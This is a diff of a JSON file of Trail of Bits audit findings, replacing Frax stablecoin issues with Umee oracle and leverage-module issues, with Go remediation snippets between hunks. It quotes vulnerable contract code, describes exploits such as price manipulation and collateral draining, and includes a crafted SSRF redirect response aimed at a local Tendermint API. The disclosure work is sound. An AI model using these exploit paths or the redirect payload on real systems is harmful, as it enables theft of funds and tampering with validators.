- "title": "18. calc_withdraw_one_coin is vulnerable to manipulation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The showAllocations function determines the amount of collateral in dollars that a contract holds using calc_withdraw_one_coin , a Curve AMM function whose result is based on the current state of the pool and changes as trades are made through the pool. This spot price can be manipulated using a flash loan or large trade similar to the one described in TOB-FRSOL-006 . function showAllocations () public view returns (uint256[ 10 ] memory return_arr) { // ------------LP Balance------------ // Free LP uint256 lp_owned = (mim3crv_metapool.balanceOf(address(this))); // Staked in the vault uint256 lp_value_in_vault = MIM3CRVInVault(); lp_owned = lp_owned.add(lp_value_in_vault); // ------------3pool Withdrawable------------ uint256 mim3crv_supply = mim3crv_metapool.totalSupply(); uint256 mim_withdrawable = 0 ; uint256 _3pool_withdrawable = 0 ; if (lp_owned > 0 ) _3pool_withdrawable = mim3crv_metapool.calc_withdraw_one_coin(lp_owned, 1 ); // 1: 3pool index Figure 18.1: contracts/Misc_AMOs/MIM_Convex_AMO.sol#L145-160 Exploit Scenario MIM_Convex_AMO is included in FRAX.globalCollateralValue , and the FraxPoolV3.bonus_rate is nonzero. An attacker manipulates the return value of calc_withdraw_one_coin , causing the protocol to undervalue the collateral and reach a less-than-desired collateralization ratio. The attacker then calls FraxPoolV3.recollateralize , adds collateral, and sells the newly minted FXS tokens, including a bonus, for profit. Recommendations Short term, do not use the Curve AMM spot price to value collateral. Long term, use an oracle or get_virtual_price to reduce the likelihood of manipulation. References Medium, \"Economic Attack on Harvest Finance: Deep Dive\"", + "title": "8. Oracle price-feeder is vulnerable to manipulation by a single malicious price feed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The price-feeder component uses a volume-weighted average price (VWAP) formula to compute average prices from various third-party providers. The price it determines is then sent to the x/oracle module, which commits it on-chain. However, an asset price could easily be manipulated by only one compromised or malfunctioning third-party provider. Exploit Scenario Most validators are using the Binance API as one of their price providers. The API is compromised by an attacker and suddenly starts to report prices that are much higher than those reported by other providers. However, the price-feeder instances being used by the validators do not detect the discrepancies in the Binance API prices. As a result, the VWAP value computed by the price-feeder and committed on-chain is much higher than it should be. Moreover, because most validators have committed the wrong price, the average computed on-chain is also wrong. The attacker then draws funds from the system. Recommendations Short term, implement a price-feeder mechanism for detecting the submission of wildly incorrect prices by a third-party provider. Have the system temporarily disable the use of the malfunctioning provider(s) and issue an alert calling for an investigation. If it is not possible to automatically identify the malfunctioning provider(s), stop committing prices. (Note, though, that this may result in a loss of interest for validators.) Consider implementing a similar mechanism in the x/oracle module so that it can identify when the exchange rates committed by validators are too similar to one another or to old values. References Synthetix Response to Oracle Incident", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: High" ] }, {
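One possible shape for the pre-VWAP sanity check recommended in finding 8, as a self-contained Go sketch: prices that deviate from the cross-provider median by more than a tolerance are excluded and flagged. The function names, threshold, and example prices are all illustrative, not part of the price-feeder codebase.

package main

import (
    "fmt"
    "sort"
)

// filterOutliers drops provider prices that deviate from the median by more
// than maxDeviation (a fraction, e.g., 0.10 for 10%). Excluded providers
// should be disabled and reported for investigation, per the recommendation.
func filterOutliers(prices map[string]float64, maxDeviation float64) map[string]float64 {
    vals := make([]float64, 0, len(prices))
    for _, p := range prices {
        vals = append(vals, p)
    }
    sort.Float64s(vals)
    median := vals[len(vals)/2]

    kept := make(map[string]float64)
    for provider, p := range prices {
        if p >= median*(1-maxDeviation) && p <= median*(1+maxDeviation) {
            kept[provider] = p // within tolerance; include in the VWAP
        }
        // else: flag `provider` and exclude it from this round
    }
    return kept
}

func main() {
    prices := map[string]float64{"binance": 101.2, "kraken": 100.8, "huobi": 99.9, "compromised": 180.0}
    fmt.Println(filterOutliers(prices, 0.10)) // drops the 180.0 outlier
}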
- "title": "19. Incorrect valuation of LP tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Frax Protocol uses liquidity pool (LP) tokens as collateral and includes their value in the global collateralization value. In addition to the protocol's incorrect inclusion of FRAX as collateral (see TOB-FRSOL-024 ), the calculation of the value of pool tokens representing Uniswap V2-like and Uniswap V3 positions is inaccurate. As a result, the global collateralization value could be incorrect. getAmount0ForLiquidity ( getAmount1ForLiquidity) returns the amount, not the value, of token0 (token1) in that price range; the price of FRAX should not be assumed to be $1, for the same reasons outlined in TOB-FRSOL-017 . The userStakedFrax helper function uses the metadata of each Uniswap V3 NFT to calculate the collateral value of the underlying tokens. Rather than using the current range, the function calls getAmount0ForLiquidity using the range set by a liquidity provider. This assumes that the current price of the assets is within the range set by the liquidity provider, which is not necessarily the case. If the market price is outside the given range, the underlying position will contain 100% of one token rather than a portion of both tokens. Thus, the underlying tokens will not be at a 50% allocation at all times, so this assumption is false. The actual redemption value of the NFT is not the same as what was deposited since the underlying token amounts and prices change with market conditions. In short, the current calculation does not update correctly as the prices of assets change, and the global collateral value will be wrong. function userStakedFrax (address account ) public view returns (uint256) { uint256 frax_tally = 0 ; LockedNFT memory thisNFT; for (uint256 i = 0 ; i < lockedNFTs[account].length; i++) { thisNFT = lockedNFTs[account][i]; uint256 this_liq = thisNFT.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_lower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_upper); if (frax_is_token0){ frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } } } // In order to avoid excessive gas calculations and the input tokens ratios. 50% FRAX is assumed // If this were Uni V2, it would be akin to reserve0 & reserve1 math // There may be a more accurate way to calculate the above... return frax_tally.div( 2 ); } Figure 19.1: contracts/Staking/FraxUniV3Farm_Volatile.sol#L241-L263 In addition, the value of Uniswap V2 LP tokens is calculated incorrectly.
The return value of getReserves is vulnerable to manipulation, as described in TOB-FRSOL-006 . Thus, the value should not be used to price LP tokens, as the value will vary significantly when trades are performed through the given pool. Such fluctuations in the LP tokens' values will result in an inaccurate global collateral value. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } Figure 19.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L217 Exploit Scenario The value of LP positions does not reflect a sharp decline in the market value of the underlying tokens. Rather than incentivizing recollateralization, the protocol continues to mint FRAX tokens and causes the true collateralization ratio to fall even further. Although the protocol appears to be solvent, due to incorrect valuations, it is not. Recommendations Short term, discontinue the use of LP tokens as collateral since the valuations are inaccurate and misrepresent the amount of collateral backing FRAX. Long term, use oracles to derive the fair value of LP tokens. For Uniswap V2, this means using the constant product to compute the value of the underlying tokens independent of the spot price. For Uniswap V3, this means using oracles to determine the current composition of the underlying tokens that the NFT represents. References Christophe Michel, \"Pricing LP tokens | Warp Finance hack\" Alpha Finance, \"Fair Uniswap's LP Token Pricing\"", + "title": "9. Oracle rewards may not be distributed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "If the x/oracle module lacks the coins to cover a reward payout, the rewards will not be distributed or registered for payment in the future. var periodRewards sdk.DecCoins for _, denom := range rewardDenoms { rewardPool := k.GetRewardPool(ctx, denom) // return if there's no rewards to give out if rewardPool.IsZero() { continue } periodRewards = periodRewards.Add(sdk.NewDecCoinFromDec( denom, sdk.NewDecFromInt(rewardPool.Amount).Mul(distributionRatio), )) } Figure 9.1: A loop in the code that calculates oracle rewards ( umee/x/oracle/keeper/reward.go#43-56 ) Recommendations Short term, document the fact that oracle rewards will not be distributed when the x/oracle module does not have enough coins to cover the rewards.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2552,29 +5310,29 @@ ] }, {
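As a worked example of the "fair" Uniswap V2 LP pricing referenced in finding 19's long-term recommendation (the Alpha Finance reference above): the value of one LP token is 2*sqrt(k*p0*p1)/totalSupply, which depends on the pool invariant k = r0*r1 and external oracle prices p0 and p1 rather than on manipulable spot reserves. A minimal Go sketch with illustrative numbers:

package main

import (
    "fmt"
    "math"
)

// fairLPValue prices one LP token from the pool invariant and oracle prices,
// independent of the (manipulable) current reserve split.
func fairLPValue(r0, r1, p0, p1, totalSupply float64) float64 {
    k := r0 * r1
    return 2 * math.Sqrt(k*p0*p1) / totalSupply
}

func main() {
    // example: 1,000 FRAX and 1,000 USDC in the pool, both priced at $1,
    // with 1,000 LP tokens outstanding
    fmt.Println(fairLPValue(1000, 1000, 1.0, 1.0, 1000)) // 2, i.e., $2 per LP token
}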
- "title": "20. Missing check of return value of transfer and transferFrom ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Some tokens, such as BAT, do not precisely follow the ERC20 specification and will return false or fail silently instead of reverting. Because the codebase does not consistently use OpenZeppelin's SafeERC20 library, the return values of calls to transfer and transferFrom should be checked. However, return value checks are missing from these calls in many areas of the code, opening the TWAMM contract (the time-weighted automated market maker) to severe vulnerabilities. function provideLiquidity(uint256 lpTokenAmount) external { require (totalSupply() != 0 , 'EC3' ); //execute virtual orders longTermOrders.executeVirtualOrdersUntilCurrentBlock(reserveMap); //the ratio between the number of underlying tokens and the number of lp tokens must remain invariant after mint uint256 amountAIn = lpTokenAmount * reserveMap[tokenA] / totalSupply(); uint256 amountBIn = lpTokenAmount * reserveMap[tokenB] / totalSupply(); ERC20(tokenA).transferFrom( msg.sender , address( this ), amountAIn); ERC20(tokenB).transferFrom( msg.sender , address( this ), amountBIn); [...] Figure 20.1: contracts/FPI/TWAMM.sol#L125-136 Exploit Scenario Frax deploys the TWAMM contract. Pools are created with tokens that do not revert on failure, allowing an attacker to call provideLiquidity and mint LP tokens for free; the attacker does not have to deposit funds since the transferFrom call fails silently or returns false . Recommendations Short term, fix the instance described above. Then, fix all instances detected by slither --detect unchecked-transfer . Long term, review the Token Integration Checklist in appendix D and integrate Slither into the project's CI pipeline to prevent regression and catch new instances proactively.", + "title": "10. Risk of server-side request forgery attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The price-feeder sends HTTP requests to configured providers' APIs. If any of the HTTP responses is a redirect response (e.g., one with HTTP response code 301), the module will automatically issue a new request to the address provided in the response's header. The new address may point to a local address, potentially one that provides access to restricted services. Exploit Scenario An attacker gains control over the Osmosis API. He changes the endpoint used by the price-feeder such that it responds with a redirect like that shown in figure 10.1, with the goal of removing a transaction from a Tendermint validator's mempool. The price-feeder automatically issues a new request to the Tendermint REST API. Because the API does not require authentication and is running on the same machine as the price-feeder , the request is successful, and the target transaction is removed from the validator's mempool. HTTP/1.1 301 Moved Permanently Location: http://localhost:26657/remove_tx?txKey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Figure 10.1: The redirect response Recommendations Short term, use a function such as CheckRedirect to disable redirects, or at least redirects to local services, in all HTTP clients.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, {
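A minimal sketch of the short-term fix for finding 10, using Go's standard net/http CheckRedirect hook (the function name and timeout are illustrative): returning http.ErrUseLastResponse makes the client hand the 3xx response back to the caller instead of fetching the attacker-chosen Location.

package feeder

import (
    "net/http"
    "time"
)

// newProviderClient returns an HTTP client that refuses to follow redirects,
// so a malicious 301 like the one in figure 10.1 is surfaced to the caller
// rather than triggering a request to a local service.
func newProviderClient() *http.Client {
    return &http.Client{
        Timeout: 10 * time.Second, // illustrative timeout
        CheckRedirect: func(req *http.Request, via []*http.Request) error {
            // do not follow any redirect; return the 3xx response as-is
            return http.ErrUseLastResponse
        },
    }
}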
- "title": "21. A rewards distributor does not exist for each reward token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The FraxUnifiedFarmTemplate contract's setGaugeController function (figure 21.1) has the onlyTknMgrs modifier. All other functions with the onlyTknMgrs modifier set a value in an array keyed only to the calling token manager's token index. Except for setGaugeController , which sets the global rewards_distributor state variable, all other functions that set global state variables have the onlyByOwnGov modifier. This modifier is stricter than onlyTknMgrs , in that it cannot be called by token managers. As a result, any token manager can set the rewards distributor that will be used by all tokens. This exposes the underlying issue: there should be a rewards distributor for each token instead of a single global distributor, and a token manager should be able to set the rewards distributor only for her token. function setGaugeController ( address reward_token_address , address _rewards_distributor_address , address _gauge_controller_address ) external onlyTknMgrs(reward_token_address) { gaugeControllers[rewardTokenAddrToIdx[reward_token_address]] = _gauge_controller_address; rewards_distributor = IFraxGaugeFXSRewardsDistributor(_rewards_distributor_address); } Figure 21.1: The setGaugeController function ( FraxUnifiedFarmTemplate.sol#639-642 ) Exploit Scenario Reward manager A calls setGaugeController to set his rewards distributor. Then, reward manager B calls setGaugeController to set his rewards distributor, overwriting the rewards distributor that A set. Later, sync is called, which in turn calls retroCatchUp . As a result, distributeRewards is called on B's rewards distributor; however, distributeRewards is not called on A's rewards distributor. Recommendations Short term, replace the global rewards distributor with an array that is indexed by token index to store rewards distributors, and ensure that the system calls distributeRewards on all reward distributors within the retroCatchUp function. Long term, ensure that token managers cannot overwrite each other's settings.", + "title": "11. Incorrect comparison in SetCollateralSetting method ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Umee users can send a SetCollateral message to disable the use of a certain asset as collateral. The messages are handled by the SetCollateralSetting method (figure 11.1), which should ensure that the borrow limit will not drop below the amount borrowed. However, the function uses an incorrect comparison, checking that the borrow limit will be greater than, not less than, that amount. // Return error if borrow limit would drop below borrowed value if newBorrowLimit.GT(borrowedValue) { return sdkerrors.Wrap(types.ErrBorrowLimitLow, newBorrowLimit.String()) } Figure 11.1: The incorrect comparison in the SetCollateralSetting method ( umee/x/leverage/keeper/keeper.go#343-346 ) Exploit Scenario An attacker provides collateral to the Umee system and borrows some coins. Then the attacker disables the use of the collateral asset; because of the incorrect comparison in the SetCollateralSetting method, the disable operation succeeds, and the collateral is sent back to the attacker. Recommendations Short term, correct the comparison in the SetCollateralSetting method. Long term, implement tests to check whether basic functionality works as expected.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: Low" ] }, {
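The corrected guard for finding 11, sketched with the names from figure 11.1: the error should fire when the new borrow limit would fall below the borrowed value, so the comparison flips from GT to LT.

// Return error if borrow limit would drop below borrowed value
if newBorrowLimit.LT(borrowedValue) {
    return sdkerrors.Wrap(types.ErrBorrowLimitLow, newBorrowLimit.String())
}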
- "title": "22. minVeFXSForMaxBoost can be manipulated to increase rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "minVeFXSForMaxBoost is calculated based on the current spot price when a user stakes Uniswap V2 LP tokens. If an attacker manipulates the spot price of the pool prior to staking LP tokens, the reward boost will be skewed upward, thereby increasing the amount of rewards earned. The attacker will earn outsized rewards relative to the amount of liquidity provided. function fraxPerLPToken () public view returns ( uint256 ) { // Get the amount of FRAX 'inside' of the lp tokens uint256 frax_per_lp_token ; // Uniswap V2 // ============================================ { [...] uint256 total_frax_reserves ; ( uint256 reserve0 , uint256 reserve1 , ) = (stakingToken.getReserves()); Figure 22.1: contracts/Staking/FraxCrossChainFarmSushi.sol#L242-L250 function userStakedFrax ( address account ) public view returns ( uint256 ) { return (fraxPerLPToken()).mul(_locked_liquidity[account]).div(1e18); } function minVeFXSForMaxBoost ( address account ) public view returns ( uint256 ) { return (userStakedFrax(account)).mul(vefxs_per_frax_for_max_boost).div(MULTIPLIER_PRECISION ); } function veFXSMultiplier ( address account ) public view returns ( uint256 ) { if ( address (veFXS) != address ( 0 )){ // The claimer gets a boost depending on amount of veFXS they have relative to the amount of FRAX 'inside' // of their locked LP tokens uint256 veFXS_needed_for_max_boost = minVeFXSForMaxBoost(account); [...] Figure 22.2: contracts/Staking/FraxCrossChainFarmSushi.sol#L260-L272 Exploit Scenario An attacker sells a large amount of FRAX through the incentivized Uniswap V2 pool, increasing the amount of FRAX in the reserve. In the same transaction, the attacker calls stakeLocked and deposits LP tokens. The attacker's reward boost, new_vefxs_multiplier , increases due to the large trade, giving the attacker outsized rewards. The attacker then swaps his tokens back through the pool to prevent losses. Recommendations Short term, do not use the Uniswap spot price to calculate reward boosts. Long term, use canonical and audited rewards contracts for Uniswap V2 liquidity mining, such as MasterChef.", + "title": "12. Voters' ability to overwrite their own pre-votes is not documented ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The x/oracle module allows voters to submit more than one pre-vote message during the same pre-voting period, overwriting their previous pre-vote messages (figure 12.1). This feature is not documented; while it does not constitute a direct security risk, it may be unintended behavior. Third parties may incorrectly assume that validators cannot change their pre-vote messages. Monitoring systems may detect only the first pre-vote event for a validator's pre-vote messages, while voters may trust the exchange rates and salts revealed by other voters to be final. On the other hand, this feature may be an intentional one meant to allow voters to update the exchange rates they submit as they obtain more accurate pricing information.
func (ms msgServer) AggregateExchangeRatePrevote( goCtx context.Context, msg *types.MsgAggregateExchangeRatePrevote, ) (*types.MsgAggregateExchangeRatePrevoteResponse, error ) { // (...) aggregatePrevote := types.NewAggregateExchangeRatePrevote(voteHash, valAddr, uint64 (ctx.BlockHeight())) // This call overwrites previous pre-vote if there was one ms.SetAggregateExchangeRatePrevote(ctx, valAddr, aggregatePrevote) ctx.EventManager().EmitEvents(sdk.Events{ // (...) - emit EventTypeAggregatePrevote and EventTypeMessage }) return &types.MsgAggregateExchangeRatePrevoteResponse{}, nil } Figure 12.1: umee/x/oracle/keeper/msg_server.go#L23-L66 Recommendations Short term, document the fact that a pre-vote message can be submitted and overwritten in the same voting period. Alternatively, disallow this behavior by having the AggregateExchangeRatePrevote function return an error if a validator attempts to submit an additional exchange rate pre-vote message. Long term, add tests to check for this behavior.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2582,59 +5340,49 @@ ] }, {
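If the Umee team chooses the disallow option from finding 12's recommendations, the check could look like the following sketch, placed before the SetAggregateExchangeRatePrevote call in figure 12.1. The GetAggregateExchangeRatePrevote getter and the ErrExistingPrevote error value are assumptions; the exact names may differ.

// reject a second pre-vote from the same validator in the same voting period
if _, err := ms.GetAggregateExchangeRatePrevote(ctx, valAddr); err == nil {
    // a pre-vote already exists for this validator; refuse to overwrite it
    return nil, sdkerrors.Wrap(types.ErrExistingPrevote, valAddr.String())
}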
- "title": "23. Most collateral is not directly redeemable by depositors ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The following describes the on-chain situation on December 20, 2021. The Frax stablecoin has a total supply of 1.5 billion FRAX. Anyone can mint new FRAX tokens by calling FraxPoolV3.mintFrax and paying the necessary amount of collateral and FXS. Conversely, anyone can redeem his or her FRAX for collateral and FXS by calling FraxPoolV3.redeemFrax . However, the Frax team manually moves collateral from the FraxPoolV3 contract into AMO contracts in which the collateral is used to generate yield. As a result, only $5 million (0.43%) of the collateral backing FRAX remains in the FraxPoolV3 contract and is available for redemption. If those $5 million are redeemed, the Frax Finance team would have to manually move collateral from the AMOs to FraxPoolV3 to make further redemptions possible. Currently, $746 million (64%) of the collateral backing FRAX is managed by the ConvexAMO contract. FRAX owners cannot access the ConvexAMO contract, as all of its operations can be executed only by the Frax team. Exploit Scenario Owners of FRAX want to use the FraxPoolV3 contract's redeemFrax function to redeem more than $5 million worth of FRAX for the corresponding amount of collateral. The redemption fails, as only $5 million worth of USDC is in the FraxPoolV3 contract. From the redeemers' perspectives, FRAX is no longer exchangeable into something worth $1, removing the base for its stable price. Recommendations Short term, deposit more FRAX into the FraxPoolV3 contract so that the protocol can support a larger volume of redemptions without requiring manual intervention by the Frax team. Long term, implement a mechanism whereby the pools can retrieve FRAX that is locked in AMOs to pay out redemptions.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: Low" - ] - }, - { - "title": "24. FRAX.globalCollateralValue counts FRAX as collateral ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Each unit of FRAX represents $1 multiplied by the collateralization ratio of debt. That is, if the collateralization ratio is 86%, the Frax Protocol owes each holder of FRAX $0.86. Instead of accounting for this as a liability, the protocol includes this debt as an asset backing FRAX. In other words, FRAX is backed in part by FRAX. Because the FRAX.globalCollateralValue includes FRAX as an asset and not debt, the true collateralization ratio is lower than stated, and users cannot redeem FRAX for the underlying collateral en masse for reasons beyond those described in TOB-FRSOL-023 . This issue occurs extensively throughout the code. For instance, the amount of FRAX in a Uniswap V3 liquidity position is included in the contract's collateral value. function TotalLiquidityFrax () public view returns ( uint256 ) { uint256 frax_tally = 0 ; Position memory thisPosition; for ( uint256 i = 0 ; i < positions_array.length; i++) { thisPosition = positions_array[i]; uint128 this_liq = thisPosition.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickLower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickUpper); if (thisPosition.collateral_address > 0x853d955aCEf822Db058eb8505911ED77F175b99e ){ // if address(FRAX) < collateral_address, then FRAX is token0 frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } } } Figure 24.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L199-L216 In another instance, the value of FRAX in FRAX/token liquidity positions on Arbitrum is counted as collateral. Again, FRAX should be counted as debt and not collateral. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } // Get the token rates return_info[ 0 ] = (reserve_pack[ 0 ] * 1e18) / (the_pair.totalSupply()); return_info[ 1 ] = (reserve_pack[ 1 ] * 1e18) / (the_pair.totalSupply()); return_info[ 2 ] = (reserve_pack[ 2 ] * 1e18) / (the_pair.totalSupply()); // Set the pair type (used later) if (return_info[ 0 ] > 0 && return_info[ 1 ] == 0 ) return_info[ 3 ] = 0 ; // FRAX/XYZ else if (return_info[ 0 ] == 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 1 ; // FXS/XYZ else if (return_info[ 0 ] > 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 2 ; // FRAX/FXS else revert( \"Invalid pair\" ); } Figure 24.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L229 Exploit Scenario Users attempt to redeem FRAX for USDC, but the collateral backing FRAX is, in part, FRAX itself, and not enough collateral is available for redemption. The collateralization ratio does not accurately reflect when the protocol is insolvent. That is, it indicates that FRAX is fully collateralized in the scenario in which 100% of FRAX is backed by FRAX.
Recommendations Short term, revise FRAX.globalCollateralValue so that it does not count FRAX as collateral, and ensure that the protocol deposits the necessary amount of collateral to ensure the collateralization ratio is reached. Long term, after fixing this issue, continue reviewing how the protocol accounts for collateral and ensure the design is sound.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { + "title": "13. Lack of user-controlled limits for input amount in LiquidateBorrow ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The x/leverage module's LiquidateBorrow function computes the amount of funds that will be transferred from the module to the function's caller in a liquidation. The computation uses asset prices retrieved from an oracle. There is no guarantee that the amount returned by the module will correspond to the current market price, as a transaction that updates the price feed could be mined before the call to LiquidateBorrow . Adding a lower limit to the amount sent by the module would enable the caller to explicitly state his or her assumptions about the liquidation and to ensure that the collateral payout is as profitable as expected. It would also provide additional protection against the misreporting of oracle prices. Since such a scenario is unlikely, we set the difficulty level of this finding to high. Using caller-controlled limits for the amount of a transfer is a best practice commonly employed by large DeFi protocols such as Uniswap. Exploit Scenario Alice calls the LiquidateBorrow function. Due to an oracle malfunction, the amount of collateral transferred from the module is much lower than the amount she would receive on another market. Recommendations Short term, introduce a minRewardAmount parameter and add a check verifying that the reward value is greater than or equal to the minRewardAmount value. Long term, always allow the caller to control the amount of a transfer. This is especially important for transfer amounts that depend on factors that can change between transactions. Enable the caller to add a lower limit for a transfer from a module and an upper limit for a transfer of the caller's funds to a module.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, {
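A sketch of finding 13's short-term recommendation: minRewardAmount would be a new, caller-supplied field on the liquidation message, checked after the reward is computed in LiquidateBorrow. The error value is hypothetical.

// enforce the caller's floor on the liquidation payout
if reward.Amount.LT(minRewardAmount) {
    return sdk.ZeroInt(), sdk.ZeroInt(),
        sdkerrors.Wrap(types.ErrRewardTooLow, reward.String()) // hypothetical error value
}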
- "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e18 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns ( uint256 ) { uint256 value_tally_e18 = 0 ; for ( uint i = 0 ; i < collateral_addresses.length; i++){ ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256 ( 18 ).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf( address ( this )).mul( 10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue (OracleLike oracle, uint256 balance ) public view returns ( uint256 ) { if ( address (oracle) == address ( 0 )) return balance; return balance.mul(oracle.read()).div( 1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insufficient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the effect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization. 18. calc_withdraw_one_coin is vulnerable to manipulation Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-FRSOL-018 Target: MIM_Convex_AMO.sol", + "title": "14. Lack of simulation and fuzzing of leverage module invariants ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Umee system lacks comprehensive Cosmos SDK simulations and invariants for its x/oracle and x/leverage modules. More thorough use of the simulation feature would facilitate fuzz testing of the entire blockchain and help ensure that the invariants hold. Additionally, the current simulation module may need to be modified for the following reasons: It exits on the first transaction error . To avoid an early exit, it could skip transactions that are expected to fail when they are generated; however, that could also cause it to skip logic that contains issues. The numKeys argument , which determines how many accounts it will use, can range from 2 to 2,500. Using too many accounts may hinder the detection of bugs that require multiple transactions to be executed by a few accounts. By default, it is configured to use a \"stake\" currency , which may not be used in the final Umee system. Running it with a small number of accounts and a large block size for many blocks could quickly cause all validators to be unbonded. To avoid this issue, the simulation would need the ability to run for a longer time. We attempted to use the simulation module by modifying the recent changes to the Umee codebase, which introduce simulations for the x/oracle and x/leverage modules (commit f22b2c7f8e ). We enabled the x/leverage module simulation and modified the Cosmos SDK codebase locally so that the framework would use fewer accounts and log errors via Fatalf logs instead of exiting. The framework helped us find the issue described in TOB-UMEE-15 , but the setup and tests we implemented were not exhaustive. We sent the codebase changes we made to the Umee team via an internal chat.
